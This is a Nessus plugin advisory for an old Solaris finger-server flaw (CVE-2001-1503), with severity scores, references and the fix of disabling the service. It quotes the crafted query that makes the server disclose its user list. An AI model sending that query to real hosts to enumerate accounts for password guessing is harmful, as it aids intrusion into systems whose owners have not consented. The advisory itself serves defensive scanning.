Solaris in.fingerd Crafted Request Information Disclosure

Medium Nessus Network Monitor Plugin ID 1280

Synopsis

The remote host may give an attacker information useful for future attacks

Description

The remote finger server discloses the full list of its users when it receives the query "a b c d e f g h". An attacker may use this flaw to try to log in with the name of each account being displayed, hoping to find a null or trivial password.

Solution

Disable the finger service.

See Also

http://archives.neohapsis.com/archives/vulnwatch/2001-q4/0016.html

Plugin Details

Severity: Medium

ID: 1280

File Name: 1280.prm

Family: Finger

Published: 2004/08/20

Modified: 2016/01/21

Nessus ID: 10788

Risk Information

Risk Factor: Medium

CVSSv2

Base Score: 5

Temporal Score: 4.4

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

Temporal Vector: CVSS2#E:H/RL:OF/RC:C

CVSSv3

Base Score: 5.3

Temporal Score: 5.1

Vector: CVSS3#AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Temporal Vector: CVSS3#E:H/RL:O/RC:C

Reference Information

CVE: CVE-2001-1503

BID: 3457